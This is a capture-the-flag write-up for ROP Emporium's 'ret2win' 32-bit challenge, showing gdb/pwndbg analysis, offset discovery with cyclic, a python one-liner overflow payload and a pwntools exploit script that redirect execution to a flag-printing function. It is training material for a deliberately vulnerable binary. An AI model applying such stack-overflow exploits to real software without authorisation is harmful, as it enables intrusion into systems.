Binary Exploitation (Pwn)
This section will talk about CTF writeup.
ROP Emporium
To download all challenge:
https://ropemporium.com/binary/rop_emporium_all_challenges.zip
Ret2win
When we run the program and enter a bunch of a . It was segmentation fault
┌─[sheinn101@parrot]─[~/ctf/rop_emporium/ret2win]
└──╼ [??]$ ./ret2win32
ret2win by ROP Emporium
x86
For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!
> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Thank you!
Segmentation fault info functions
pwndbg> info functions
All defined functions:
Non-debugging symbols:
0x08048374 _init
0x080483b0 read@plt
0x080483c0 printf@plt
0x080483d0 puts@plt
0x080483e0 system@plt
0x080483f0 __libc_start_main@plt
0x08048400 setvbuf@plt
0x08048410 memset@plt
0x08048420 __gmon_start__@plt
0x08048430 _start
0x08048470 _dl_relocate_static_pie
0x08048480 __x86.get_pc_thunk.bx
0x08048490 deregister_tm_clones
0x080484d0 register_tm_clones
0x08048510 __do_global_dtors_aux
0x08048540 frame_dummy
0x08048546 main
0x080485ad pwnme
0x0804862c ret2win
0x08048660 __libc_csu_init
0x080486c0 __libc_csu_fini
0x080486c4 _finiDisassemble ret2win
pwndbg> disassemble ret2win
Dump of assembler code for function ret2win:
0x0804862c <+0>: push ebp
0x0804862d <+1>: mov ebp,esp
0x0804862f <+3>: sub esp,0x8
0x08048632 <+6>: sub esp,0xc
0x08048635 <+9>: push 0x80487f6
0x0804863a <+14>: call 0x80483d0 <puts@plt>
0x0804863f <+19>: add esp,0x10
0x08048642 <+22>: sub esp,0xc
0x08048645 <+25>: push 0x8048813
0x0804864a <+30>: call 0x80483e0 <system@plt>
0x0804864f <+35>: add esp,0x10
0x08048652 <+38>: nop
0x08048653 <+39>: leave
0x08048654 <+40>: ret It has system function which is /bin/cat flag.txt
Generate pattern with cyclic , run the program and paste it.
pwndbg> cyclic 100
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
pwndbg>To know the offset , run cyclic -l laaa .
Now we know the offset is 44 ,So the payload will be like this. A*44 + ret2win address which is cat flag.txt
Check the address of ret2win function
pwndbg> p ret2win
$1 = {<text variable, no debug info>} 0x804862c <ret2win>
pwndbg>Change it that address to little endian like this \x2c\x86\x04\x08
┌─[sheinn101@parrot]─[~/ctf/rop_emporium/ret2win]
└──╼ [??]$ python -c 'print "A"*44 + "\x2c\x86\x04\x08"' | ./ret2win32
ret2win by ROP Emporium
x86
For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!
> Thank you!
Well done! Here's your flag:
ROPE{a_placeholder_32byte_flag!}
Segmentation fault
Script with pwntools
#!/usr/bin/python3
from pwn import *
elf = context.binary = ELF('./ret2win32',checksec=False)
p = process()
padding = 44
payload = flat(
asm('nop') * padding,
elf.symbols['ret2win'],
)
# f = open("payload", "wb")
# f.write(payload)
p.sendlineafter(">", payload)
p.interactive()─[sheinn101@parrot]─[~/ctf/rop_emporium/ret2win]
└──╼ [??]$ python3 auto_pwn.py
[+] Starting local process '/home/sheinn101/ctf/rop_emporium/ret2win/ret2win32': pid 432041
[*] Switching to interactive mode
Thank you!
Well done! Here's your flag:
ROPE{a_placeholder_32byte_flag!}
[*] Got EOF while reading in interactiveComming Soon...
Last updated
